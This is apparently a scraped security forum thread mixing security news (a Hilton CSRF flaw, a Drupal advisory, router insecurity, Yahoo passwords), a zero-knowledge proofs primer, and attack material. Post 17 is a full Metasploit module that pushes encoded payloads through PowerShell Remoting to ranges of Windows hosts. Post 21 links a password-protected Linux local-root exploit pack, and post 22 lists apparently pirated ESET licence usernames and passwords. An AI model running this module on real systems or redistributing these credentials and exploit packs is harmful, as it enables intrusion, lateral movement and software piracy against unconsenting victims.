  17. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell def initialize(info = {}) super(update_info(info, 'Name' => 'Powershell Remoting Remote Command Execution', 'Description' => %q{ Uses Powershell Remoting (TCP 47001) to inject payloads on target machines. If RHOSTS are specified it will try to resolve the IPs to hostnames, otherwise use a HOSTFILE to supply a list of known hostnames. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell' ], 'References' => [ [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) [ 'OSVDB', '3106'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'DisclosureDate' => 'Jan 01 1999', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter', 'shell' ], 'Targets' => [ [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ] ], 'DefaultTarget' => 0 )) register_options([ OptString.new('SMBUser', [ false, 'The username to authenticate as' ]), OptString.new('SMBPass', [ false, 'The password for the specified username' ]), OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ]), OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]), OptPath.new('HOSTFILE', [ false, 'Line separated file with hostnames to target' ]), # Move this out of advanced OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']), OptBool.new("ExitOnSession", [ true, "Return from the exploit after a session has been created", false ]) ]) register_advanced_options( [ OptInt.new("ListenerTimeout", [ false, "The maximum number of seconds to wait for new sessions", 60]) ], self.class) end def exploit if !datastore['ExitOnSession'] && !job_id fail_with(Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)") end unless datastore['RHOSTS'] || datastore['HOSTFILE'] fail_with(Failure::BadConfig, "Need RHOSTS or HOSTFILE specified.") end if datastore['SMBUser'] && datastore['SMBPass'].nil? fail_with(Failure::BadConfig, "Need both username and password set.") end if datastore['RHOSTS'] ip_list = "$iplist=" Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |ip| ip_list << "'#{ip}'," end # Remove trailing comma... ip_list = ip_list[0..-2] ip_list << ";" end known_hosts = "" if datastore['HOSTFILE'] ::File.open(datastore['HOSTFILE'], "rb").each_line do |hostname| hostname.strip! known_hosts << "'#{hostname}'," unless hostname.blank? end known_hosts = known_hosts[0..-2] end command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) ps = <<EOF #{generate_credentials} $ResultList=@(#{known_hosts}); #{ip_list} foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName}; Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start #{command} } EOF if datastore['SMBUser'] ps << " -Credential $creds" end # If the host process terminates too quickly the jobs will die # before they spawn in a new process. ps << ";Sleep 20;" ps.gsub!("\n", "") command = generate_psh_command_line( noprofile: true, windowstyle: 'hidden', command: ps ) print_status("Executing command...") begin cmd_exec(command) rescue Rex::TimeoutError end stime = Time.now.to_f loop do break if session_created? && datastore['ExitOnSession'] break if datastore['ListenerTimeout'].to_i > 0 && (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f) Rex.sleep(1) end print_status("Completed") end def generate_credentials(domain = datastore['SMBDomain'], user = datastore['SMBUser'], pass = datastore['SMBPass']) creds = "" unless user.nil? creds = "$pass=ConvertTo-SecureString -string '#{pass}' -asPlainText -force;"\ "$creds=new-object -typename System.Management.Automation.PSCredential -argumentlist " if domain.nil? creds << "'#{user}'" else creds << "'#{domain}\\#{user}'" end creds << ",$pass;" end creds end end Source
  18. A cross-site request forgery (CSRF) vulnerability in the website of hotel chain Hilton Worldwide could have inadvertently compromised much of its users’ personal information. Ironically the since-fixed issue stemmed from a promotion the chain was offering to users if they changed their passwords on a benefits service it runs. As part of the offer, users who changed passwords associated with their Hilton Honors account before April 1 would be given 1,000 free awards points. According to Krebs on Security, until Hilton fixed a loophole in its system, the same promotion could have let anyone hijack the account of someone who switched his or her password as long as the attacker could guess their nine-digit account number correctly. By reconfiguring the site’s HTML and reloading the page, attackers could have gleaned additional information, like the customers’ email address, physical address, and the last four digits of any credit card number they may have had on file. Attackers basically would have had complete access to the person’s account. They could have changed the password associated with it, viewed upcoming and past trips, and allowed them to use the victim’s points to book future trips. The vulnerability could have even let the attackers liquidate the user’s account and funnel their points into prepaid debit cards or into another user’s account. Researchers Brandon Potter and JB Snyder at the security firm Bancsec logged into Krebs’ Hilton account and forwarded him screenshots as proof they had found a vulnerability. It was only after Krebs contacted the hotel company that it stopped allowing users to reset their passwords and fixed the issue. “Hilton Worldwide recently confirmed a vulnerability on a section of our Hilton Honors website, and we took immediate action to remediate the vulnerability,” Hilton said in statement, according to Krebs. On top of the CSRF vulnerability, apparently Hilton didn’t enforce users to re-enter their current passwords when changing to a new one. Its site even told users whether each nine-digit number they entered was valid, according to Krebs, something which could have compounded the issue further. Attackers could have rigged the PIN reset page checker to determine users’ PINs, Snyder told Krebs. “There are a billion combinations but this… could be easily automated,” Snyder said. Hilton Hotels did fix the issue and now forbids users from using a PIN as their password. Instead users are prompted to pick a password that consists of at least eight characters, one uppercase, and a number or special character. Users can apparently still change their password without entering their current password however. Source
  19. Drupal, one of the widely used open source content management system is recommending its users to update their software to the latest versions 6.35 and 7.35 after the company discovered two moderately critical vulnerabilities that may allow an attacker to hack Drupal websites. According to a security advisory published yesterday, a flaw found in the Drupal core could allow a potential hacker under certain circumstances to bypass security restrictions by forging the password reset URLs. ACCESS BYPASS / PASSWORD RESET URLs VULNERABILITY Successful exploitation of this Access Bypass vulnerability could leverage the hacker to gain unauthorized access to user accounts without knowing their password. This vulnerability is considered as moderately critical in which an attacker can remotely trick a registered user of Drupal based website, such as an administrator, into launching a maliciously crafted URL in an attempt to take control of the target server. AFFECTED DRUPAL WEBSITES The exploitation of the access bypass vulnerability on Drupal 7 website is possible only if the account importing or programmatically editing process results in the password hash in the database being the same for multiple user accounts. The websites running Drupal 6 are at greater risk, because the administrators of the websites have created multiple new user accounts protected by the same password. Moreover, the security vulnerability can also be exploited in the Drupal 6 websites where accounts have been imported or programmatically edited in a way that results in the password hash field in the database being empty for at least for one user account. OPEN REDIRECT VULNERABILITY The affected versions of Drupal CMS are also susceptible to an open redirect vulnerability. Drupal action URLs contain a "destination" parameter in it, which can be used by cyber criminals to redirect users to a third-party location with malicious content. According to the Drupal team, there are multiple URL-related API functions in affected versions of Drupal 6 and 7 which can be used by attackers into passing through external URLs when not required. This could potentially lead to additional open redirect vulnerabilities. The issue is actually serious because Drupal is used to power over 1 billion websites on Internet, which puts Drupal in third place behind the Wordpress and Joomla. Drupal provides a Content management system for websites including MTV, Popular Science, Sony Music, Harvard and MIT. RECOMMENDATIONS Website administrators are strongly recommended to take some necessary steps: Update to the latest version of Drupal core, i.e. Drupal core 6.35 and Drupal core 7.35 Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack. Do not click on links from unknown sources. Do not open email attachments from unknown or untrusted sources. Consider implementing file extension whitelists for allowed e-mail attachments. Source
  20. Yahoo has launched an on-demand password service that lets forgetful customers tie their account security to their mobile phone. Yahoo director of product management Chris Stoner announced the service, which US users can opt into now. The 'On-demand passwords' feature can be activated in the security section of Yahoo accounts' settings menu. Once activated, the user will be instructed to enter their mobile phone number. From this point on, whenever the customer attempts to open their account Yahoo will send a custom unlock code to their phone, removing the need for them to remember a password. Stoner said the service is part of Yahoo's ongoing efforts to make account security easier for users. "We've all been there. You're logging into your email and you panic because you've forgotten your password. After racking your brain for what feels like hours, it finally comes to you. Phew," he said. "Today, we're hoping to make that process less anxiety-inducing by introducing on-demand passwords, which are texted to your mobile phone when you need them. You no longer have to memorise a difficult password to sign in to your account - what a relief." The service is available to US users now. There is no confirmed UK release date and at the time of publishing Yahoo had not responded to V3's request for comment on when it will roll out the service in Europe. The release follows reports that many users are still failing to take even basic cyber defence measures to protect their personal data. Yahoo CEO Marissa Mayer controversially revealed she does not lock her smartphone with a password or gesture, as it made unlocking the device "too time-consuming". Yahoo is one of many companies to experiment with alternative password security services. Apple and Samsung added biometric fingerprint scanners to their latest iPhone 6 and Galaxy S6 smartphones. Source
  21. Guest

    Linux Localroots 2001 - 2014

    Download : https://mega.co.nz/#!oB0FnATb!sxgDQBiHUa9Ht6Qekw3U5-qJYyNJ49xtXbgLYAgTE98 Password : lxiuiwekleweiisooweem28849030923790932nuc3743nc8xeuihdc
  22. Poate are cineva nevoie de licenta pentru ESET 8, las mai jos o lista. ESS Username: EAV-0129076670 Password: t4umj3uab6 Expiry Date: 08.01.2016 ESS Username: EAV-0129730947 Password: fs7863tvat Expiry Date: 16.01.2016 ESS Username: EAV-0100442188 Password: c68p5r4cks Expiry Date: 11.12.2016 ESS Username: EAV-0116349122 Password: tf2sf3cdm6 Expiry Date: 19.07.2017 ESS Username: EAV-0133192861 Password: 573fmv9t9e Expiry Date: 30.05.2015 ESS Username: EAV-0133280939 Password: vxpj5ufjdt Expiry Date: 31.05.2015 ESS Username: EAV-0133280972 Password: xf3fxn5dap Expiry Date: 31.05.2015 ESS Username: EAV-0133280996 Password: 8t48m8tj7c Expiry Date: 31.05.2015 ESS Username: TRIAL-0134312425 Password: v4rh22ud9e Expiry Date: 10.06.2015
  23. One of the best things about modern cryptography is the beautiful terminology. You could start any number of punk bands (or Tumblrs) named after cryptography terms like 'hard-core predicate', 'trapdoor function', ' or 'impossible differential cryptanalysis'. And of course, I haven't even mentioned the one term that surpasses all of these. That term is 'zero knowledge'. In fact, the term 'zero knowledge' is so appealing that it leads to problems. People misuse it, assuming that zero knowledge must be synonymous with 'really, really secure'. Hence it gets tacked onto all kinds of stuff -- like encryption systems and anonymity networks -- that really have nothing to do with true zero knowledge protocols. This all serves to underscore a point: zero-knowledge proofs are one of the most powerful tools cryptographers have ever devised. But unfortunately they're also relatively poorly understood. In this series of posts I'm going try to give a (mostly) non-mathematical description of what ZK proofs are, and what makes them so special. In this post and the next I'll talk about some of the ZK protocols we actually use. Origins of Zero Knowledge The notion of 'zero knowledge' was first proposed in the 1980s by MIT researchers Shafi Goldwasser, Silvio Micali and Charles Rackoff. These researchers were working on problems related to interactive proof systems, theoretical systems where a first party (called a 'Prover') exchanges messages with a second party ('Verifier') to convince the Verifier that some mathematical statement is true.* Prior to Goldwasser et al., most work in this area focused the soundness of the proof system. That is, it considered the case where a malicious Prover attempts to 'trick' a Verifier into believing a false statement. What Goldwasser, Micali and Rackoff did was to turn this problem on its head. Instead of worrying only about the Prover, they asked: what happens if you don't trust the Verifier? The specific concern they raised was information leakage. Concretely, they asked, how much extra information is the Verifier going to learn during the course of this proof, beyond the mere fact that the statement is true? It's important to note that this is not simply of theoretical interest. There are real, practical applications where this kind of thing matters. Here's one: imagine that a real-world client wishes to log into a web server using a password. The standard 'real world' approach to this problem involves storing a hashed version of the password on the server. The login can thus be viewed as a sort of 'proof' that a given password hash is the output of a hash function on some password -- and more to the point, that the client actually knows the password. Most real systems implement this 'proof' in the absolute worst possible way. The client simply transmits the original password to the server, which re-computes the password hash and compares it to the stored value. The problem here is obvious: at the conclusion of the protocol, the server has learned my cleartext password. Modern password hygiene therefore involves a good deal of praying that servers aren't compromised. What Goldwasser, Micali and Rackoff proposed was a new hope for conducting such proofs. If fully realized, zero knowledge proofs would allow us to prove statements like the one above, while provably revealing no information beyond the single bit of information corresponding to 'this statement is true'. A 'real world' example So far this discussion has been pretty abstract. To make things a bit more concrete, let's go ahead and give a 'real' example of a (slightly insane) zero knowledge protocol. For the purposes of this example, I'd like you to imagine that I'm a telecom magnate in the process of deploying a new cellular communications network. My network structure is represented by the graph below. Each vertex in this graph represents a cellular radio tower, and the connecting lines (edges) indicate locations where two cells overlap, meaning that their transmissions are likely to interfere with each other. Pentru mai multe informatii, intrati aici: A Few Thoughts on Cryptographic Engineering: Zero Knowledge Proofs: An illustrated primer
  24. Feature "It is far more common to find routers with critical flaws than without" - Craig Young "It's sad that end-user education about strong passwords, password safes, and phishing can be undone by something as innocuous as the blinking box in the corner of your room. - Peter Adkins Introduction Home and small business router security is terrible. Exploits emerge with depressing regularity, exposing millions of users to criminal activities. Many of the holes are so simple as to be embarrassing. Hard-coded credentials are so common in small home and office routers, comparatively to other tech kit, that only those with tin-foil hats bother to suggest the flaws are deliberate. Hacker gang Lizard Squad crystallised the dangers – and opportunities – presented by router vulnerabilities when over the Christmas break they crafted a slick paid denial of service stresser service that operated on hacked boxes. Customers were found paying to flood targets of choice with gigabits of bandwidth stolen from what the black hats claimed were a fleet of half a million vulnerable and subsequently hacked routers. A year earlier, security boffins at Team Cymru warned that an unknown ganghad popped 300,000 routers in a week, altering the DNS settings to point to malicious web entities. Those routers were hacked through a self-propagating worm (PDF) that researchers had already warned about, but not yet seen. It used a mix of brute force password guessing of web admin consoles, cross-site request forgery, and known un-patched vulnerabilities. Arguably the most infamous hack in recent months was Check Point's so-called Misfortune Cookie discovered in December 2014. This vulnerability was thought to impact a staggering 12 million routers across 200 models from big names such as Linksys, D-Link, TP-Link, ZTE, and Huawei. Affected routers could be hijacked with a crafted cookie that allows attackers to meddle with just about everything on the units, from password theft, to alterations to DNS, and infection of connected devices. In October Rapid7 had chipped in with its own research, warning that Network Address Translation Port Mapping Protocol configurations in 1.2 million routers was sufficiently borked that remote attackers could spy on internal traffic. Security is 'abysmal' "Router security remains abysmal, especially among the cheapest brands,” says John Matherly, founder of the popular Shodan search engine which crawls for internet-connected devices. “Backdoors, no automated patching and default usernames and passwords are just a few of the problems that many SOHO routers continue to face.” Matherly last month dug up an estimated 250,000 routers used in Spain that were using the same SSH keys, placing those configured a for remote access at heighten risk. He also points to research published two days later by Entrust Solutions hacker Nabin Kc, who found 200,000 home routers contained a firmware backdoor, a flaw replicated across 10 different vendors who seemed to be re-branding a vanilla router. Matherly says badge-engineering seems a common practise for vendors that compete on price over form or function. “It seems that the rate of security problems discovered with routers is only limited by the number of security experts that take the time to analyse the devices,” he says. Source
  25. Demo I Download Password: baywebmaster.com BayWebMaster | Bir WebMaster Blogu
×
×
  • Create New...